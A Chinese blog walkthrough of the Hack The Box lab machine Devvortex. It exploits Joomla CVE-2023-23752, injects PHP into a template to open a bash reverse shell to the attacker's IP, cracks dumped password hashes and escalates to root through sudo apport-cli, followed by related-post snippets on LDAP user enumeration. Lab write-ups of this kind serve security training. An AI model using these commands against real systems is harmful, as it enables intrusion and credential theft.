HTB靶场- Devvortex

于 2023-12-30 20:27:53 发布
阅读量1k 收藏 23
点赞数 19
分类专栏: 打靶 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/135307898
版权

端口探测

nmap -sV 10.10.11.242

在这里插入图片描述
首先访问一下80端口,发现跳转到这个域名上了,所以要做一个host绑定
在这里插入图片描述

sudo vi /etc/hosts

在这里插入图片描述
成功访问网站,通过观察发现是一个静态页面
在这里插入图片描述

目录扫描

python3 dirsearch.py -u http://devvortex.htb/ -e*

在这里插入图片描述

扫描以后也没有什么可以利用的信息,接下来在进行收集

子域名探测

使用gobuster进行子域名扫描,如果没有seclists字典工具,需要下载

apt install seclists

——————————
gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ --append-domain --no-error

在这里插入图片描述

可以看到扫描出来一个dev.devvortex.htb,还是需要host绑定
在这里插入图片描述
接下来我们在对子域名进行目录扫描
在这里插入图片描述
在这里插入图片描述
通过探测发现administrator,README.txt目录是有重要信息的
访问administrator目录,发现是joomla CMS
在这里插入图片描述
README.txt目录里泄露了版本信息
在这里插入图片描述
我们也可以通过joomscan这个工具进行扫描,得到版本号4.2.6

joomscan -u http://dev.devvortex.htb/

在这里插入图片描述

漏洞利用

Joomla4.2.6版本有一个未授权访问漏洞(CVE-2023-23752)
未授权路径

/api/index.php/v1/config/application?public=true

有账号和密码,数据库相关信息,可以尝试进行登录
在这里插入图片描述
lewis/P4ntherg0t1n5r3c0n##
在这里插入图片描述
成功登录
在这里插入图片描述
观察发现有两个用户
在这里插入图片描述

代码注入

并且在这里发现了代码注入
在这里插入图片描述
在这里插入图片描述
在error.php中加入phpinfo();看看是否执行,千万别忘了保存
在这里插入图片描述
成功执行
在这里插入图片描述

反弹shell

进行反弹shell

system(“bash -c ‘bash -i >& /dev/tcp/10.10.14.49/1234 0>&1’”);

在这里插入图片描述
在kali中进行监听

nc -lnvp 1234

访问http://dev.devvortex.htb/templates/cassiopeia/error.php进行代码的执行

在这里插入图片描述
成功反弹shell,但是权限不够,所以我们提升一下权限
进行会话交互

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

数据库连接

由于未授权漏洞我们可知是一个mysql数据库并且在joomla库中
进行连接数据库

mysql -u lewis -p
在进行输入密码

在这里插入图片描述

使用joomla数据库
use joomla;
展示数据库中的表
show tables;
把表中的数据显示出来
select * from sd4fg_users;

在这里插入图片描述
在这里插入图片描述

将logan的密码放在一个txt里
echo ‘$2y 10 10 10IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12’ >pass.txt
将hash值破解出来得到密码
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

在这里插入图片描述

ssh连接

进行ssh连接

ssh logan@10.10.11.242

在这里插入图片描述
得到了user的flag
在这里插入图片描述

权限提升

查看一下sudo的权限,发现有一个apport-cli
在这里插入图片描述
去网上搜索发现有漏洞 地址
在这里插入图片描述
先创建一个pid

sleep 5000 &

在这里插入图片描述
进行连接

sudo /usr/bin/apport-cli -f --pid=4682

在这里插入图片描述
kill pid

kill 4682

在这里插入图片描述
输入V,在输入!进入到交互页面
在这里插入图片描述
现在是root权限
在这里插入图片描述
成功拿到root的flag
在这里插入图片描述

HTB靶场 Shared
weixin_45682839的博客
08-22 2308
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4669
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
HTB靶场使用教程
鹧鸪的起点
07-25 2039
简单介绍下HTB注册教程
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 8597
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
htb靶场获取邀请码一步到位
luminous_you的博客
10-31 2819
参考大佬的博客 发现前面的步骤出现的东西都是一样的,如果有兴趣看怎末找注册码可以跳转https://cloud.tencent.com/developer/article/1512000 也可以直接命令行输入,生成注册码(省略找的环节) curl -XPOST https://www.hackthebox.eu//api/invite/generate S1RFQVEtWEZaVUItR0tTQUYtRU1XWlgtUVNKQlI= 编码转换 http://tool.chinaz.com/Tools/B
HTB-Devvortex-CVE-2023-1326
q
12-17 238
Devvortex使用nmap扫描服务器使用wfuzz进行子域名爆破爆破出dev的子域名,将子域名加入hosts使用gobuster对dev.devvortex.htb进行目录扫描扫描出administrator的目录发现登录页面扫描出README.txt,发现joomla版本为4.2发现是joomla cms在网上发现有专门的漏洞扫描工具:joomscan下载使用joomscan进行扫描扫描出joomla的版本为4.2.6 并且扫描出部分目录。
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
HTB靶场】TIER-0-Redeemer
Madess的博客
05-20 906
HTB靶场】TIER-0-Redeemer靶机
HTB靶场系列 Windows靶机 Optimum靶机
m0_57221101的博客
01-28 2686
勘探 依然是nmap扫描 nmap 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST Nmap scan report for 10.10.10.8 Host is up (0.031s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1
HTB系列】靶机Access的渗透测试详解
大方子
03-26 1590
介绍 信息收集 首先我们用nmap探测下靶机的信息 nmap-sC-sV-T510.10.10.98 可以看到靶机开放了21,23,80端口。 telnet后面有一个?说明nmap也不确定是否为telnet 这里我用msf来探测下FTP是否允许 匿名登陆 使用msf的/auxiliary/scanner/ftp/anonymous模块 ...
HTB靶场系列 linux靶机 Tartarsause靶机
m0_57221101的博客
01-21 1873
勘探 nmap直接扫 root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT Warning: 10.10.10.88 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.88 Host
HTB靶场-Web-Gunship
mxymmxym的博客
01-25 4152
今天玩Hackthebox开始做Web题第一题就被难到了(很容易级别的),上网的WriteUP也乱七八糟的,连NC,写入文件,最后才找到有用的 考点:AST Injection, Prototype Pollution to RCE 先写下最后的利用Exploit POST /api/submit HTTP/1.1 Host: yourhost Content-Length: 170 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8687
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2017年存储技术变革与发展的趋势.pdf
05-07
2017年存储技术变革与发展的趋势.pdf
毕业论文-qing游戏风格 商业版(GBK)-整站商业源码.zip
最新发布
05-07
毕业论文-qing游戏风格 商业版(GBK)-整站商业源码.zip
实训商业源码-效能-毕业设计.zip
05-07
实训商业源码-效能-毕业设计.zip
平台跳跃者:虚拟重力与精确控制的动力学艺术
05-07
平台跳跃游戏的核心魅力在于重力与控制的精妙平衡。本文将构建角色运动的微分方程模型,解析空中机动算法,并揭示关卡设计中的隐式引力场理论,展现2D平台游戏背后的复杂物理模拟系统。
实训商业源码-签到工具-毕业设计.zip
05-07
实训商业源码-签到工具-毕业设计.zip
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
04-08
### 使用 NXC 工具通过 LDAP 枚举域用户 NXC 是一款功能强大的网络扫描工具,支持多种协议操作,其中包括 LDAP 协议。要使用 NXC 进行 LDAP 用户枚举,可以通过指定域名、用户名和密码来实现。 以下是具体的命令结构以及如何执行的操作: #### 命令格式 ```bash nxc ldap <target-ip> -u <username> -p <password> --domain <domain-name> --users ``` 在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb --users ``` 此命令会尝试通过 LDAP 连接到目标主机,并利用提供的凭据枚举域中的所有用户账户[^1]。 #### 脚本解释 - `-u`: 指定用于连接的目标用户名。 - `-p`: 提供对应的密码。 - `--domain`: 设置活动目录的域名。 - `--users`: 请求脚本返回当前域内的所有用户列表。 如果成功完成身份验证,则应显示一系列属于该域的有效用户条目;反之,在遇到错误时可以根据提示进一步排查原因(如无效凭据或权限不足等问题)。 #### 注意事项 为了确保能够顺利访问远程服务器上的资源,请确认以下几点: - 验证所提供的用户名 (`rose`) 及其关联密钥是否有效。 - 确认目标机器开放了必要的端口 (通常是 TCP/389 或者 SSL 加密模式下的 TCP/636),以便允许外部客户端发起查询请求。 - 如果防火墙规则阻止了这些通信路径,则可能需要调整配置或者寻找其他可用方法绕过限制条件。 --- ### 示例代码片段展示 Python 中基于 ldap3 的简单实现方式 对于更深入的理解,下面给出一段采用 python 编写的示例程序,它同样实现了上述提到的功能逻辑: ```python from ldap3 import Server, Connection, ALL server = Server('ldap.sequel.htb', get_info=ALL) user_dn = 'CN=rose,CN=Users,DC=sequel,DC=htb' password = 'KxEPkKe6R8su' try: conn = Connection(server, user=user_dn, password=password, auto_bind=True) # Search for all users within the domain. conn.search('dc=sequel,dc=htb', '(objectClass=person)', attributes=['sAMAccountName']) entries = conn.entries if not entries: print("No users found.") else: for entry in entries: print(entry.sAMAccountName.value) except Exception as e: error_code = str(e).split()[0].strip('(').strip(')') if error_code == '52e': print('账号密码不正确') elif error_code == '775': print('账号已锁定,请联系管理员或等待自动解锁') elif error_code == '533': print('账号已禁用') else: print(f'认证失败,请检查账号 {error_code}') ``` 以上脚本展示了如何构建一个基本的 LDAP 查询过程,其中包含了异常处理机制以应对可能出现的不同类型的登录问题。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值